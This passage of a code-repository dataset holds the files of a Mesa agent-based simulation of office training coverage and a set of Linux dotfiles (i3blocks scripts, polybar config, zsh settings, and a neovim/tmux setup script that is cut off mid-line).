repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
patsess/agent-based-models-practice
https://github.com/patsess/agent-based-models-practice
a5c6f31ab4247fa2eeee925dbc41abd1ebe59e04
ce0c07df2ce5bb1dc058780059bb01bd4f303e60
e0eb502f6e44c2dcba68a59b79008c7269ef421f
refs/heads/master
2022-12-13T09:53:31.844548
2020-02-05T11:43:28
2020-02-05T11:43:28
238,211,957
0
0
null
2020-02-04T13:24:53
2020-02-05T11:43:52
2022-12-08T03:33:19
Python
[ { "alpha_fraction": 0.595329225063324, "alphanum_fraction": 0.6026033759117126, "avg_line_length": 31.234567642211914, "blob_id": "7a731d55c7c64ad70edb0987875827bab6df6a57", "content_id": "4292eaee1e33edd3d9fb6efcd1da1719df88b94d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2612, "license_type": "no_license", "max_line_length": 76, "num_lines": 81, "path": "/agentbasedmodelspractice/office_training/model.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport logging\nimport random\nfrom mesa import Model\nfrom mesa.time import RandomActivation\nfrom mesa.space import SingleGrid\nfrom mesa.datacollection import DataCollector\nfrom agentbasedmodelspractice.office_training.trainer import Trainer\nfrom agentbasedmodelspractice.office_training.office_worker_agent import (\n OfficeWorker)\n\n__author__ = 'psessford'\n\nlogging.basicConfig(level=logging.INFO)\n\n# TODO: docstrs\n# TODO: more logging\n\n# TODO: RANDOMISE LOOP THROUGH WORKERS FROM THE TRAINER!!!\n\n\nclass TrainingCoverage(Model):\n def __init__(self, height=20, width=20, density=0.65, n_steps=100):\n super().__init__()\n self.height = height\n self.width = width\n self.density = density\n self.n_steps = n_steps\n\n self.logger = logging.getLogger(__name__)\n\n self.schedule = RandomActivation(self)\n self.grid = SingleGrid(width, height, torus=False)\n\n self.is_trained = 0\n self.datacollector = DataCollector({'is_trained': 'is_trained'})\n\n self.trainer = Trainer()\n\n self._set_up_agents()\n\n self.running = True\n self.datacollector.collect(self)\n\n def step(self):\n self.is_trained = 0 # reset counter of trained agents\n self.schedule.step()\n self.datacollector.collect(self) # update tracker of trained agents\n\n self._update_worker_training()\n\n if self.n_steps < self.schedule.steps:\n self.running = False # run for specified number of steps\n\n def _set_up_agents(self):\n for cell in self.grid.coord_iter():\n x = cell[1] # grid coordinate\n y = cell[2]\n if self.random.random() < self.density:\n time_at_desk = random.random()\n agent = OfficeWorker(\n pos=(x, y), model=self, time_at_desk=time_at_desk)\n self.grid.position_agent(agent, (x, y))\n self.schedule.add(agent)\n\n def _update_worker_training(self):\n n_workers_trained = 0\n for cell in self.grid.coord_iter():\n if self.trainer.capacity <= n_workers_trained:\n break # no more trainer capacity for this step\n\n agent = cell[0]\n if agent is None:\n continue\n\n train_decision = self.trainer.get_train_decision(\n worker_agent=agent)\n if train_decision:\n self.logger.info(f\"trainer is training office worker at \"\n f\"location ({cell[1]}, {cell[2]})\")\n agent.is_trained = True\n n_workers_trained += 1\n" }, { "alpha_fraction": 0.8275862336158752, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 29, "blob_id": "941ca7df3150c185983fc284a48d9d5ecf511026", "content_id": "57c8826ebe5948b6549c5bf5802b843bec294a7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 29, "license_type": "no_license", "max_line_length": 29, "num_lines": 1, "path": "/README.md", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "# agent-based-models-practice" }, { "alpha_fraction": 0.6776119470596313, "alphanum_fraction": 0.6776119470596313, "avg_line_length": 29.363636016845703, "blob_id": "0f54be07cb60d0f7baf9051c1c1b264385e99b00", "content_id": "821df04dba96b3f373ff8c2185f4ef43bddc5291", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 74, "num_lines": 11, "path": "/agentbasedmodelspractice/office_training/run.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\n# import sys\n# from pathlib import Path\n# module_path = str(Path(__file__).absolute().parent.parent.parent)\n# if module_path not in sys.path:\n# sys.path.append(module_path) # e.g. '.../repos/<name_of_this_repo>'\n\nfrom agentbasedmodelspractice.office_training.server import server\n\n\nif __name__ == '__main__':\n server.launch()\n" }, { "alpha_fraction": 0.5726218223571777, "alphanum_fraction": 0.5758700966835022, "avg_line_length": 29.338027954101562, "blob_id": "d09f9b13614f44fa183382fe99e255d22e262812", "content_id": "129a6159cee1e9dc06cc7bc1982ae26567dbc178", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2155, "license_type": "no_license", "max_line_length": 80, "num_lines": 71, "path": "/agentbasedmodelspractice/office_training/office_worker_agent.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport logging\nimport random\nfrom mesa import Agent\n\n__author__ = 'psessford'\n\nlogging.basicConfig(level=logging.INFO)\n\n# TODO: docstrs\n\n\nclass OfficeWorker(Agent):\n def __init__(self, pos, model, time_at_desk):\n super().__init__(pos, model)\n self.pos = pos\n self.time_at_desk = time_at_desk\n\n self.logger = logging.getLogger(__name__)\n\n # initialise useful attributes\n self.is_trained = False\n self.neighbour_training = 0\n\n # initialise helpers for properties\n self._collaboration = None\n\n @property\n def max_n_neighbours(self):\n return 8\n\n @property\n def neighbour_training_scalar(self):\n return 0.1\n\n @property\n def collaboration(self):\n if self._collaboration is None:\n self._collaboration = self._get_worker_collaboration()\n\n return self._collaboration\n\n def step(self):\n self._set_neighbour_training()\n self._update_is_trained_by_neighbour()\n\n def _get_worker_collaboration(self):\n return sum(self.model.grid.neighbor_iter(self.pos))\n\n def _set_neighbour_training(self):\n self.neighbour_training = (\n sum(neighbour.is_trained\n for neighbour in self.model.grid.neighbor_iter(self.pos)) /\n float(self.max_n_neighbours))\n\n def _update_is_trained_by_neighbour(self):\n if not self.is_trained:\n for neighbour in self.model.grid.neighbor_iter(self.pos):\n if not neighbour.is_trained:\n continue\n\n r = (random.random() * self.time_at_desk *\n self.neighbour_training_scalar)\n # self.logger.info(\n # f\"random value to determine training from neighbour: {r}\")\n is_training_received = ((1. - neighbour.time_at_desk) < r)\n if is_training_received:\n self.logger.info(\n f\"neighbour training rubbed off on office worker at \"\n f\"location ({neighbour.pos[0]}, {neighbour.pos[1]})\")\n self.is_trained = True\n break\n" }, { "alpha_fraction": 0.6135675311088562, "alphanum_fraction": 0.6480920910835266, "avg_line_length": 29, "blob_id": "375217535b2de7442cdeb07cad03d644ac5d4cc7", "content_id": "0fcf0f2ebce8b3077012c64d109bf1785d3a07a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1651, "license_type": "no_license", "max_line_length": 76, "num_lines": 55, "path": "/agentbasedmodelspractice/office_training/server.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nfrom mesa.visualization.ModularVisualization import ModularServer\nfrom mesa.visualization.modules import CanvasGrid, ChartModule, TextElement\nfrom mesa.visualization.UserParam import UserSettableParameter\nfrom agentbasedmodelspractice.office_training.model import TrainingCoverage\n\n\nclass TrainingCoverageElement(TextElement):\n '''\n Display a text count of how many happy agents there are.\n '''\n\n def __init__(self):\n super().__init__()\n\n def render(self, model):\n return \"Number of staff trained agents: \" + str(model.is_trained)\n\n\ndef draw_training_coverage(agent):\n '''\n Portrayal Method for canvas\n '''\n if agent is None:\n return None\n\n portrayal = {\"Shape\": \"circle\", \"r\": 0.5, \"Filled\": \"true\", \"Layer\": 0}\n\n if agent.is_trained == 0:\n portrayal[\"Color\"] = [\"#FF0000\", \"#FF9999\"]\n portrayal[\"stroke_color\"] = \"#00FF00\"\n else:\n portrayal[\"Color\"] = [\"#0000FF\", \"#9999FF\"]\n portrayal[\"stroke_color\"] = \"#000000\"\n\n return portrayal\n\n\ntraining_element = TrainingCoverageElement()\ncanvas_element = CanvasGrid(\n draw_training_coverage, grid_width=20, grid_height=20, canvas_width=500,\n canvas_height=500)\ntraining_chart = ChartModule([{\"Label\": \"is_trained\", \"Color\": \"Black\"}])\n\nmodel_params = {\n \"height\": 20,\n \"width\": 20,\n \"density\": UserSettableParameter(\n \"slider\", \"Agent density\", value=0.65, min_value=0.1, max_value=1.0,\n step=0.05),\n \"n_steps\": 100,\n}\n\nserver = ModularServer(TrainingCoverage,\n [canvas_element, training_element, training_chart],\n \"Schelling\", model_params)\n" }, { "alpha_fraction": 0.4585987329483032, "alphanum_fraction": 0.6857749223709106, "avg_line_length": 14.699999809265137, "blob_id": "293fac360433558bbda0514f9d8100e66efed34c", "content_id": "bda1813eb95b1796d46944ab25bb44efda84d4f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 471, "license_type": "no_license", "max_line_length": 22, "num_lines": 30, "path": "/requirements.txt", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "arrow==0.15.5\nbinaryornot==0.4.4\ncertifi==2019.11.28\nchardet==3.0.4\nClick==7.0\ncookiecutter==1.7.0\ncycler==0.10.0\ndecorator==4.4.1\nfuture==0.18.2\ngunicorn==20.0.4\nidna==2.8\nJinja2==2.11.1\njinja2-time==0.2.0\nkiwisolver==1.1.0\nMarkupSafe==1.1.1\nmatplotlib==3.1.3\nMesa==0.8.6\nnetworkx==2.4\nnumpy==1.18.1\npandas==1.0.0\npoyo==0.5.0\npyparsing==2.4.6\npython-dateutil==2.8.1\npytz==2019.3\nrequests==2.22.0\nsix==1.14.0\ntornado==6.0.3\ntqdm==4.42.1\nurllib3==1.25.8\nwhichcraft==0.6.1\n" }, { "alpha_fraction": 0.6883116960525513, "alphanum_fraction": 0.6883116960525513, "avg_line_length": 26.909090042114258, "blob_id": "f0067574ae742b989c9157b6f87887938c604048", "content_id": "c3b3e668a1804fca94dd59b064fed91a3fa46b3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 72, "num_lines": 11, "path": "/app.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport sys\nfrom pathlib import Path\nmodule_path = str(Path(__file__).absolute().parent)\nif module_path not in sys.path:\n sys.path.append(module_path) # e.g. '.../repos/<name_of_this_repo>'\n\nfrom agentbasedmodelspractice.office_training.run import server\n\n\nif __name__ == '__main__':\n server.launch()\n" }, { "alpha_fraction": 0.6150943636894226, "alphanum_fraction": 0.6251572370529175, "avg_line_length": 28.407407760620117, "blob_id": "a7a1389e707f2d0731e3eefdb78d7814771edb68", "content_id": "569643e033a1ce1c6048816fd3b34dd3202b382d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 795, "license_type": "no_license", "max_line_length": 75, "num_lines": 27, "path": "/agentbasedmodelspractice/office_training/trainer.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport random\n\n__author__ = 'psessford'\n\n# TODO: docstrs\n# TODO: logging\n\n\nclass Trainer(object):\n def __init__(self, capacity=2, team_importance=0.5):\n self.capacity = capacity\n self.team_importance = team_importance\n self.individual_importance = 1. - self.team_importance\n\n def get_train_decision(self, worker_agent):\n assert (0. <= worker_agent.neighbour_training <= 1.)\n assert (0. <= worker_agent.time_at_desk <= 1.)\n\n worker_importance = (\n self.individual_importance * worker_agent.time_at_desk)\n team_importance = (\n self.team_importance * worker_agent.neighbour_training)\n\n r = random.random()\n train_decision = ((r < worker_importance) or (r < team_importance))\n\n return train_decision\n" } ]
8
johnnylord/dotfile
https://github.com/johnnylord/dotfile
2e87314ac881f05c6d928e2f21cd5c90481f0bd8
456f1b78e7afee85b13c0b18df25a125a6a08030
6a947f28b4e072d4bc1ae4a79059692fcbf156f9
refs/heads/master
2023-06-15T05:30:56.959185
2023-06-03T06:31:17
2023-06-03T06:31:17
173,019,376
3
1
null
null
null
null
null
[ { "alpha_fraction": 0.6333333253860474, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 29, "blob_id": "9f498ed53fed6866556b4bfd944aaa036ee8672a", "content_id": "328f6176ac494ba32b85204a5901c8882fc41667", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "permissive", "max_line_length": 49, "num_lines": 2, "path": "/i3blocks/weather/weather_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\necho \" $(~/.config/i3blocks/weather/weather.py) \"\n" }, { "alpha_fraction": 0.4247104227542877, "alphanum_fraction": 0.48262548446655273, "avg_line_length": 63.75, "blob_id": "e0ec78c60287cb6ed20d94439328fc75ec98a52b", "content_id": "10c77391a4202882d33939577d52923e1a2c7ba1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 261, "license_type": "permissive", "max_line_length": 107, "num_lines": 4, "path": "/i3blocks/cpu/cpu_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\nTEMP=$(sensors | grep 'Package id 0:\\|Tdie' | grep ':[ ]*+[0-9]*.[0-9]*°C' -o | grep '+[0-9]*.[0-9]*°C' -o)\nCPU_USAGE=$(mpstat 1 1 | awk '/Average:/ {printf(\"%s\\n\", $(NF-9))}')\necho \"$CPU_USAGE $TEMP\" | awk '{ printf(\" CPU:%6s% @ %s \\n\"), $1, $2 }'\n" }, { "alpha_fraction": 0.5798816680908203, "alphanum_fraction": 0.5917159914970398, "avg_line_length": 28.39130401611328, "blob_id": "5aa416de1b05dee0b2418c38b1706ffd5c799d76", "content_id": "f9a9458fcc150dcfd41bf9761bd3a3325e85408a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 676, "license_type": "permissive", "max_line_length": 130, "num_lines": 23, "path": "/i3wm/bin/logout", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Manage logout with rofi\noption=`echo -e \"suspend\\nlock screen\\nlogout\\nreboot\\npoweroff\\nKill user $USER\" | rofi -width 600 -dmenu -p system:`\ncase $option in\n suspend)\n sudo /usr/bin/systemctl syspend\n ;;\n 'lock screen')\n i3lock -i /home/koromicha/Pictures/linuxtux.png\n ;;\n logout)\n i3-nagbar -t warning -m 'Are you sure you want to exit i3? This will end your X session.' -b 'Yes, exit i3' 'i3-msg exit'\n ;;\n reboot)\n /usr/bin/systemctl reboot\n ;;\n poweroff)\n /usr/bin/systemctl poweroff\n ;;\n 'kill user $USER')\n loginctl kill-user $USER\n ;;\nesac\n" }, { "alpha_fraction": 0.5581395626068115, "alphanum_fraction": 0.5930232405662537, "avg_line_length": 42, "blob_id": "435469322d093bac9bfed7d445756e5011de1773", "content_id": "4f3ef3c00535cd855fc60f421123abcc2fb4db01", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 86, "license_type": "permissive", "max_line_length": 73, "num_lines": 2, "path": "/i3wm/bin/rofifinder", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/bash\nxdg-open \"$(locate -i / | rofi -threads 0 -width 60 -dmenu -i -p \"Find\")\"\n" }, { "alpha_fraction": 0.7382199168205261, "alphanum_fraction": 0.7434554696083069, "avg_line_length": 20.22222137451172, "blob_id": "afa0f5db1d9f1c78d8ca66ee12fa317943dff005", "content_id": "11f82654d70a9732f3a45bc38ca99277440a3104", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 191, "license_type": "permissive", "max_line_length": 40, "num_lines": 9, "path": "/zsh/exports.zsh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "export EDITOR=\"nvim\"\n\n# Pyenv\nexport PYENV_ROOT=\"$HOME/.pyenv\"\nexport PATH=\"$PYENV_ROOT/bin:$PATH\"\nexport PYENV_VIRTUALENV_DISABLE_PROMPT=1\n\n# Include snap path\nexport PATH=\"/snap/bin:$PATH\"\n" }, { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.6891891956329346, "avg_line_length": 36, "blob_id": "3a0ac421623975b4b79bfdd484332eb266634ab1", "content_id": "d3cef712df17a4361c4e1ccffc2080b20c1a3e63", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 74, "license_type": "permissive", "max_line_length": 56, "num_lines": 2, "path": "/zsh/aliases.zsh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "alias vim=\"nvim\"\nalias graph=\"git log --all --decorate --oneline --graph\"\n" }, { "alpha_fraction": 0.6743687391281128, "alphanum_fraction": 0.7004526257514954, "avg_line_length": 23.9139461517334, "blob_id": "0ff47d5dcb26c3925bb6fd69746b29bc22c9fb4c", "content_id": "e2bf9dbe281cfb7075456c3970c5ddd6dc934e99", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 9025, "license_type": "permissive", "max_line_length": 91, "num_lines": 337, "path": "/.config/polybar/config", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": ";==========================================================\n;\n;\n; ██████╗ ██████╗ ██╗ ██╗ ██╗██████╗ █████╗ ██████╗\n; ██╔══██╗██╔═══██╗██║ ╚██╗ ██╔╝██╔══██╗██╔══██╗██╔══██╗\n; ██████╔╝██║ ██║██║ ╚████╔╝ ██████╔╝███████║██████╔╝\n; ██╔═══╝ ██║ ██║██║ ╚██╔╝ ██╔══██╗██╔══██║██╔══██╗\n; ██║ ╚██████╔╝███████╗██║ ██████╔╝██║ ██║██║ ██║\n; ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝\n;\n;\n; To learn more about how to configure Polybar\n; go to https://github.com/jaagr/polybar\n;\n; The RADME contains alot of cyanrmation\n;\n;==========================================================\n\n[colors]\nbackground = ${xrdb:background}\nbackground-alt = ${xrdb:color8}\nforeground = ${xrdb:foreground}\nforeground-alt = ${xrdb:color15}\n\ncyan = ${xrdb:color6}\ngreen = ${xrdb:color2}\nyellow = ${xrdb:color3}\nred = ${xrdb:color1}\n\n[bar/mybar]\nwidth = 100%\nheight = 30\nradius-top = 5\nfixed-center = false\n\nbackground = ${colors.background}\nforeground = ${colors.foreground}\n\nline-size = 3\nline-color = ${colors.background-alt}\n\npadding-left = 0\npadding-right = 2\n\nmodule-margin-left = 0\nmodule-margin-right = 2\n\nfont-0 = DejaVu Sans Mono:style=Bold:size=12;2\nfont-1 = Font Awesome 5 Free,Font Awesome 5 Free Solid:style=Solid:size=12;2\nfont-2 = Font Awesome 5 Brands,Font Awesome 5 Brands Regular:style=Regular:size=12;2\n\nmodules-left = i3\nmodules-center =\nmodules-right = backlight-acpi pulseaudio wlan eth1 eth2 battery0 battery1 temperature date\n\nlocale = en_US.UTF-8\n\ncursor-click = pointer\ncursor-scroll = ns-resize\n\n[module/i3]\ntype = internal/i3\nformat = <label-state> <label-mode>\nindex-sort = true\nwrapping-scroll = false\n\nws-icon-0 = 1;\nws-icon-1 = 2;\nws-icon-2 = 3;\nws-icon-3 = 4;\nws-icon-4 = 5;\nws-icon-5 = 6;\n\n; Only show workspaces on the same output as the bar\n;pin-workspaces = true\n\nlabel-mode-padding = 2\nlabel-mode-foreground = ${colors.foreground}\nlabel-mode-background = ${colors.background}\n\n; focused = Active workspace on focused monitor\nlabel-focused = %icon%\nlabel-focused-background = ${colors.background}\nlabel-focused-underline = ${colors.green}\nlabel-focused-padding = 2\n\n; unfocused = Inactive workspace on any monitor\nlabel-unfocused = %icon% %index%\nlabel-unfocused-underline = ${colors.background-alt}\nlabel-unfocused-padding = 2\n\n; visible = Active workspace on unfocused monitor\nlabel-visible = %icon% %index%\nlabel-visible-background = ${colors.background}\nlabel-visible-underline = ${colors.yellow}\nlabel-visible-padding = 2\n\n; urgent = Workspace with urgency hint set\nlabel-urgent = %icon% %index%\nlabel-urgent-background = ${colors.red}\nlabel-urgent-padding = 2\n\n; Separator in between workspaces\n; label-separator = |\n\n[module/xbacklight]\ntype = internal/xbacklight\n\nformat = <label> <bar>\nlabel = BL\n\nbar-width = 10\nbar-indicator = |\nbar-indicator-foreground = #fff\nbar-indicator-font = 2\nbar-fill = ─\nbar-fill-font = 2\nbar-fill-foreground = #9f78e1\nbar-empty = ─\nbar-empty-font = 2\nbar-empty-foreground = ${colors.foreground-alt}\n\n[module/backlight-acpi]\ninherit = module/xbacklight\ntype = internal/backlight\ncard = intel_backlight\n\n[module/wlan]\ntype = internal/network\ninterface = wlp3s0\ninterval = 3.0\n\nformat-connected-prefix = \" \"\nformat-connected-prefix-foreground = ${colors.green}\nformat-connected-underline = ${colors.green}\nlabel-connected = %local_ip%\n\nformat-disconnected =\n;format-disconnected = <label-disconnected>\n;format-disconnected-underline = ${self.format-connected-underline}\n;label-disconnected = %ifname% disconnected\n;label-disconnected-foreground = ${colors.foreground-alt}\n\n[module/eth1]\ntype = internal/network\ninterface = enp0s31f6\ninterval = 3.0\n\nformat-connected-prefix = \" \"\nformat-connected-prefix-foreground = ${colors.green}\nformat-connected-underline = ${colors.green}\nlabel-connected = %local_ip%\n\nformat-disconnected =\n;format-disconnected = <label-disconnected>\n;format-disconnected-underline = ${self.format-connected-underline}\n;label-disconnected = %ifname% disconnected\n;label-disconnected-foreground = ${colors.foreground-alt}\n\n[module/eth2]\ntype = internal/network\ninterface = enp0s20f0u4u1u2\ninterval = 3.0\n\nformat-connected-prefix = \" \"\nformat-connected-prefix-foreground = ${colors.green}\nformat-connected-underline = ${colors.green}\nlabel-connected = %local_ip%\n\nformat-disconnected =\n;format-disconnected = <label-disconnected>\n;format-disconnected-underline = ${self.format-connected-underline}\n;label-disconnected = %ifname% disconnected\n;label-disconnected-foreground = ${colors.foreground-alt}\n\n[module/date]\ntype = internal/date\ninterval = 5\n\ndate =\ndate-alt = \" %Y-%m-%d\"\n\ntime = %H:%M\ntime-alt = %H:%M:%S\n\nformat-prefix = \nformat-prefix-foreground = ${colors.foreground}\nformat-underline = ${colors.foreground}\n\nlabel = %date% %time%\n\n[module/pulseaudio]\ntype = internal/pulseaudio\n\nformat-volume = <label-volume> <bar-volume>\nlabel-volume = VOL\nlabel-volume-foreground = ${root.foreground}\n\nlabel-muted = 🔇 muted\nlabel-muted-foreground = #666\n\nbar-volume-width = 10\nbar-volume-foreground-0 = #55aa55\nbar-volume-foreground-1 = #55aa55\nbar-volume-foreground-2 = #55aa55\nbar-volume-foreground-3 = #55aa55\nbar-volume-foreground-4 = #55aa55\nbar-volume-foreground-5 = #f5a70a\nbar-volume-foreground-6 = #ff5555\nbar-volume-gradient = false\nbar-volume-indicator = |\nbar-volume-indicator-font = 2\nbar-volume-fill = ─\nbar-volume-fill-font = 2\nbar-volume-empty = ─\nbar-volume-empty-font = 2\nbar-volume-empty-foreground = ${colors.foreground-alt}\n\n[module/alsa]\ntype = internal/alsa\n\nformat-volume = <label-volume> <bar-volume>\nlabel-volume = VOL\nlabel-volume-foreground = ${root.foreground}\n\nformat-muted-prefix = \" \"\nformat-muted-foreground = ${colors.foreground-alt}\nlabel-muted = sound muted\n\nbar-volume-width = 10\nbar-volume-foreground-0 = #55aa55\nbar-volume-foreground-1 = #55aa55\nbar-volume-foreground-2 = #55aa55\nbar-volume-foreground-3 = #55aa55\nbar-volume-foreground-4 = #55aa55\nbar-volume-foreground-5 = #f5a70a\nbar-volume-foreground-6 = #ff5555\nbar-volume-gradient = false\nbar-volume-indicator = |\nbar-volume-indicator-font = 2\nbar-volume-fill = ─\nbar-volume-fill-font = 2\nbar-volume-empty = ─\nbar-volume-empty-font = 2\nbar-volume-empty-foreground = ${colors.foreground-alt}\n\n[module/battery0]\ntype = internal/battery\nbattery = BAT0\nadapter = AC\nfull-at = 98\n\nformat-charging = <animation-charging> <label-charging>\nformat-charging-underline = ${colors.yellow}\n\nformat-discharging = <animation-discharging> <label-discharging>\nformat-discharging-underline = ${colors.red}\n\nformat-full-prefix = \" \"\nformat-full-prefix-foreground = ${colors.green}\nformat-full-underline = ${colors.green}\n\nanimation-charging-0 = \nanimation-charging-1 = \nanimation-charging-2 = \nanimation-charging-3 = \nanimation-charging-4 = \nanimation-charging-foreground = ${colors.yellow}\nanimation-charging-framerate = 750\n\nanimation-discharging-0 = \nanimation-discharging-1 = \nanimation-discharging-2 = \nanimation-discharging-3 = \nanimation-discharging-4 = \nanimation-discharging-foreground = ${colors.red}\nanimation-discharging-framerate = 750\n\n[module/battery1]\ntype = internal/battery\nbattery = BAT1\nadapter = AC\nfull-at = 98\n\nformat-charging = <animation-charging> <label-charging>\nformat-charging-underline = ${colors.yellow}\n\nformat-discharging = <animation-discharging> <label-discharging>\nformat-discharging-underline = ${colors.red}\n\nformat-full-prefix = \" \"\nformat-full-prefix-foreground = ${colors.green}\nformat-full-underline = ${colors.green}\n\nanimation-charging-0 = \nanimation-charging-1 = \nanimation-charging-2 = \nanimation-charging-3 = \nanimation-charging-4 = \nanimation-charging-foreground = ${colors.yellow}\nanimation-charging-framerate = 750\n\nanimation-discharging-0 = \nanimation-discharging-1 = \nanimation-discharging-2 = \nanimation-discharging-3 = \nanimation-discharging-4 = \nanimation-discharging-foreground = ${colors.red}\nanimation-discharging-framerate = 750\n\n[module/temperature]\ntype = internal/temperature\nthermal-zone = 0\nwarn-temperature = 70\n\nformat = <ramp> <label>\nformat-underline = ${colors.yellow}\nformat-warn = <ramp> <label-warn>\nformat-warn-underline = ${colors.red}\n\nlabel = %temperature-c%\nlabel-warn = %temperature-c%\nlabel-warn-foreground = ${colors.red}\n\nramp-0 = \nramp-1 = \nramp-2 = \nramp-foreground = ${colors.yellow}\n\n[settings]\nscreenchange-reload = true\n\n[global/wm]\nmargin-top = 5\nmargin-bottom = 5\n\n; vim:ft=dosini\n" }, { "alpha_fraction": 0.5849056839942932, "alphanum_fraction": 0.5849056839942932, "avg_line_length": 12.25, "blob_id": "df93cb852f4de4f04603a66cc1a6cb179ac24ab3", "content_id": "e0bed4e2a8b8e58e188bc06d6b918ea6965f8750", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "permissive", "max_line_length": 26, "num_lines": 4, "path": "/README.md", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "## How to run\n```bash\nsudo ./setup.sh [username]\n```\n" }, { "alpha_fraction": 0.6646544337272644, "alphanum_fraction": 0.6700665950775146, "avg_line_length": 29.598726272583008, "blob_id": "19a813fb743632e585caf0bcb147979d4e9eef17", "content_id": "56bf0bfe9ad7c44abb6867450b375459c2399648", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4804, "license_type": "permissive", "max_line_length": 83, "num_lines": 157, "path": "/setup.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ $USER != \"root\" ]; then\n echo \"Please execute setup.sh with sudo permission\"\n exit 1\nfi\n\nif [ $# -ne 1 ]; then\n echo \"Please enter [username] after setup.sh\"\n exit 1\nfi\n\n# Check user is valid or not\nUSERNAME=$1\ngrep -Fq \"/home/${USERNAME}:\" /etc/passwd\nif [ $? -eq 1 ]; then\n echo \"${USERNAME} is not registered in the system\"\n exit 1\nfi\necho \"Setup environment for user '${USERNAME}'\"\n\nDISTRO=$(lsb_release -r | cut -f 2)\n\n# Install neovim editor\n# ====================================================================\napt-get install -y software-properties-common\nadd-apt-repository -y ppa:neovim-ppa/stable\napt-get update\napt-get install -y neovim\n\napt-get install -y python-dev python-pip python3-dev python3-pip\npython -m pip install neovim\npython3 -m pip install neovim\npython3 -m pip install pynvim\n\n# Change editor alternatives\nupdate-alternatives --install /usr/bin/vi vi /usr/bin/nvim 60\nupdate-alternatives --set vi\nupdate-alternatives --install /usr/bin/vim vim /usr/bin/nvim 60\nupdate-alternatives --set vim\nupdate-alternatives --install /usr/bin/editor editor /usr/bin/nvim 60\nupdate-alternatives --set editor\n\n# Setup configuration file\nNVIM_DIR=\"/home/${USERNAME}/.config/nvim\"\nmkdir -p ${NVIM_DIR}\ncp neovim/init.vim \"${NVIM_DIR}/init.vim\"\n\n# Install vim-plug plugin manager\nVIM_PLUG_URL=\"https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim\"\nVIM_PLUG_DIR=\"/home/${USERNAME}/.local/share/nvim/site/autoload\"\nLOCAL_DIR=\"/home/${USERNAME}/.local\"\nmkdir -p ${VIM_PLUG_DIR}\nwget -O \"${VIM_PLUG_DIR}/plug.vim\" ${VIM_PLUG_URL}\n\n# Update file permission\nchown -R ${USERNAME}:${USERNAME} ${NVIM_DIR}\nchown -R ${USERNAME}:${USERNAME} ${VIM_PLUG_DIR}\nchown -R ${USERNAME}:${USERNAME} ${LOCAL_DIR}\n\n# Install tmux\n# =====================================================================\napt-get install -y tmux\n\n# Setup configuration file\nTMUX_CONF_FILE=\"/home/${USERNAME}/.tmux.conf\"\ncp \"tmux/tmux.conf\" ${TMUX_CONF_FILE}\n\n# Update file permission\nchown ${USERNAME}:${USERNAME} 